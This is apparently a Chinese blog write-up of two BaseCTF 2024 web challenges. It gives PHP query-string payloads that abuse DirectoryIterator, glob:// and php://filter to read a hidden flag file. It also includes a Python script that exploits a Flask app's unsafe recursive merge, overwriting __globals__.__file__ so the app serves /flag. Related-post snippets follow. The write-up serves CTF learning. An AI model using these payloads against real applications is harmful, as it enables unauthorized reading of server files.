2024BaseCTF Web

最新推荐文章于 2024-09-24 21:17:34 发布
最新推荐文章于 2024-09-24 21:17:34 发布
阅读量169 收藏 3
点赞数 9
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80913334/article/details/141942206
版权

[Week4] flag直接读取不就行了?

?K=DirectoryIterator&W=glob:///secret/*

J=SplFileObject&H=php://filter/read=convert.base64-encode/resource=/secret/f11444g.php

[Week4] 圣钥之战1.0

进入后可以发现题目说去read找flag

所以访问发现得到源码

from flask import Flask,request
import json

app = Flask(__name__)

def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

def is_json(data):
    try:
        json.loads(data)
        return True
    except ValueError:
        return False

class cls():
    def __init__(self):
        pass

instance = cls()

@app.route('/', methods=['GET', 'POST'])
def hello_world():
    return open('/static/index.html', encoding="utf-8").read()

@app.route('/read', methods=['GET', 'POST'])
def Read():
    file = open(__file__, encoding="utf-8").read()
    return f"J1ngHong说:你想read flag吗?
那么圣钥之光必将阻止你!
但是小小的源码没事,因为你也读不到flag(乐)

{file}

"

@app.route('/pollute', methods=['GET', 'POST'])
def Pollution():
    if request.is_json:
        merge(json.loads(request.data),instance)
    else:
        return "J1ngHong说:钥匙圣洁无暇,无人可以污染!"
    return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?"

if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80)

是一道原型链污染(其实从题目提示的污染就可以猜到了)

根据代码我们可以知道是需要发送JSON数据到/pollute,merge函数会尝试将这个 JSON 数据合并到instance对象中,再根据/read目录里的file = open(__file__, encoding="utf-8").read(),可以猜测有可能利用__file__属性打开flag文件查看。

exp:

import requests
import json

url = "http://challenge.basectf.fun:23859/pollute"

data = {
    "__class__":{
        "__init__":{
            "__globals__":{
                "__file__":"/../../flag"
            }
        }
    }
}

# 将字典转换为JSON格式的字符串
json_data = json.dumps(data)

# 发送POST请求
response = requests.post(url, data=json_data,headers={'Content-Type': 'application/json'})

print(response.text)    //J1ngHong说:圣钥暗淡了一点,你居然污染成功了?

此时再返回题目访问/read即可得到flag

TGlu
关注
BaseCTF2024 web
pwfortune的博客
09-23 1280
wireshark工具打开, 导出对象 --> http , 存在一个flag.php文件, 打开是反过来的flag, 写个python小脚本将其反过来就行。, 但是那个地址里面的内容是不可控的, 里面也不存在一个这样的内容, 所以可以想到需要一个地址里面的内容可控, 这个时候就会想到使用。打开flag.txt可以发现是一个假的flag, 找半天, 其实真的flag就在这个文件内容的下面, base64两次解密就行。解密打开, 又存在一个flag.txt的伪加密, 010打开,
2024BaseCTF-反方向的雪
WTT001的博客
08-29 317
平台提示看雪,是snow隐写。
BaseCTF2024 Web方向 WP
2302_81393479的博客
09-22 214
文章在博客,链接:BaseCTF2024 Web&Misc WP | 0pium's Blog (hack3r0pium.github.io)
XYCTF 2024 Web
weixin_45906533的博客
04-29 931
用户名密码:admin/asdqwe进入以后就是ssti模板注入,但是禁用了{ [ ’ "后来发现只要输入中文,就可以进行模板注入了[ 方括号被禁用可以使用__双引号单引号被禁用,使用使用request.values.a绕过此题的源码。
2024BaseCTF-week1-wp
star3119391396的博客
08-22 2887
群里的海报,有十张,每张都潜藏flag的一部分,需要使用ps或者其他调色软件进行调色后寻找,大概就是像下面的图一样。这个压缩包也需要密码,但是却是伪加密,放进010editor修改过后就能解压,拿到里面的flag。表面上看确实是,但根据后来题目提示发现,里面的另一个压缩包才是伪加密,这个是真有密码。那就需要从图片入手。检索关键词flag,用tcp流打开,查看流,最后找到flag。这里的flag有两个,上面那个是假的,最后那个才是真的。打开文件,进行解压缩,发现一个png图片和一个压缩包。
BaseCTFweb(week2)
qq_74350234的博客
09-01 1414
我们很容易发现Sea类中_get()方法有函数被执行了,即将$sea_ani()函数执行,那我们可以将$sea_ani变量值修改成Shark的对象,那么我们调用函数的时候,就是把Shark当做函数调用了,因为$sea_ani的权限是public,所以我们在类外面就可以修改$sea_ani为new Shark();4.接着该调用_get()方法,调用时机就是引用不存在的属性或者私有属性时,发现_destruct()方法调用了未定义的属性,那么就可以把see的属性值改成new Sea();
BaseCTF week1 WEB
m0_74008548的博客
09-09 653
BaseCTF WEB WEEK1
BaseCTF-Web-week1
weixin_71913298的博客
08-22 1077
BaseCTF-web1
BaseCTF-Web-Week2-WP
Welcome To Myon'Blog !
08-28 1249
但是$s2->word = $s1; 中 word 是私有变量,这里是调用不到的,链子顺序没有问题,修改代码访问私有变量。方法(1)通过使用 PHP 的反射机制访问和修改类的私有属性。原本是有一个工具 hashpump,但是我 git 的时候提示找不到仓库了,然后在 github 上找到了一个写好的 python脚本,叫做 hash-ext-attack:
BaseCTF2024 MISC 根本进不去啊!(原创).md
08-22
BaseCTF2024 MISC 根本进不去啊!(原创).md
2024年网络安全最新ISCTF2024新生赛-MISC_blueshark ctf
2401_84264630的博客
05-03 617
回复消息可得flag。
print ("BaseCTF{"+''.join (OO0O0O00O00O00OO0 )+"}")#line:76
09-13
2. `"BaseCTF{"` 是一个字符串常量,看起来像是一个格式化的输出,可能是一个CTF(Capture The Flag)比赛中的某个挑战。 3. `+` 是字符串连接操作符,在这里用于拼接字符串。 4. `''.join(...)` 是一个在Python中...
BUUCTF Http
zoixsoadji的博客
03-14 540
解法一 进入题目,查看一下源代码 发现源代码中有个可以的超链接,进去看看 提示我说不是从这个域名过来的,第一反应就是抓包,修改请求头 弹出了第二个界面,说我们必须要用Syclover这个浏览器,那我们就修改user - agent 又跳出了一个新页面,提示我们说我们只能从本地阅读,那我们就伪造IP 然后flag就出来了 解法2 上面这种解法挺好用,但是就是在做题前要先抓个包,有点小烦,然后我就试了试bugku 还是进入那个Secret....
文件系统设计 - 开发文件系统 Store (上篇)
qq_44746132的博客
09-21 560
本章以一个基础的响应式Store类开始,对编辑器最核心的基础模块-文件系统管理进行开发设计,遵循面向接口编程的理念,设计文件系统的相关接口类型定义。
webview2加载本地页面
qq_25160759的博客
09-23 567
推荐使用这种方式,加载速度比WebResourceRequested快(实测的确是快点),但是需要支持:ICoreWebView2_3。个人测试加载html字符串,对于html中引入了css和js,加载不太友好。这种方式是通过截获网络请求,然后返回需要的数据。以达到成功请求的假象。
WebGL复杂几何体与模型加载
天涯学馆
09-23 380
WebGL中,复杂几何体的创建通常涉及多个顶点和面片,而模型加载则涉及到导入外部文件格式,如OBJ、GLTF或FBX。在WebGL中,可以通过设置不同类型的灯光来改变3D场景的光照效果。在WebGL中,可以通过增加更多的灯光uniforms并在片段着色器中计算它们的组合效果来实现多光源。除了基本的漫射和镜面高光,还可以添加软边缘高光、环境光遮蔽(Ambient Occlusion)和全局光照等效果,以增强光照的真实感。GLTF是一种现代的3D模型格式,包含了模型的几何体、材质、纹理和动画。
apply、call和bind的作用和区别
欢迎来到我的博客!我是一名全栈开发工程师,主攻前端开发。希望通过我的博客,能够与大家共同学习和成长。感谢您的关注和支持!
09-23 669
javascript中,apply、call和bind的作用和区别介绍。
DC00015基于java web校园网上购物系统
最新发布
黄昏下的黎明的博客
09-24 581
DC00015【含配套文档】基于java web校园网上购物系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值